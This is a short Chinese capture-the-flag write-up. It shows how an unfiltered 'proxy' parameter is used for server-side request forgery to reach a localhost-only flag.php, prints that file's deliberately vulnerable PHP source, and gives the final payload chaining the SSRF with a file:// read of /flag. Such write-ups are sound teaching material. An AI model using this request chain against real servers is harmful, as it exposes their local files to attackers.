Skip to content

MyGO!!!!!

先演奏一下春日影,抓几个包,发现有一个未过滤的 proxy,可能可以打 SSRF。

抓包发现 proxy 参数

尝试发现只允许 http 协议

仅允许 HTTP 协议

dirsearch 扫描目录发现有 flag.php,直接访问 403,尝试 SSRF 访问 /index.php?proxy=http://127.0.0.1/flag.php

得到源码

php
<?php
$client_ip = $_SERVER['REMOTE_ADDR'];

// 只允许本地访问
if ($client_ip !== '127.0.0.1' && $client_ip !== '::1') {
    header('HTTP/1.1 403 Forbidden');
    echo "你是外地人,我只要\"本地\"人";
    exit;
}

highlight_file(__FILE__);
if (isset($_GET['soyorin'])) {
    $url = $_GET['soyorin'];

    echo "flag在根目录";
    // 普通请求
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, false); // 直接输出给浏览器
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_BUFFERSIZE, 8192);
    curl_exec($ch);
    curl_close($ch);
    exit;
}

?>

curl 允许 file 协议,/index.php?proxy=http://127.0.0.1/flag.php?soyorin=file:///flag 成功拿到 FLAG。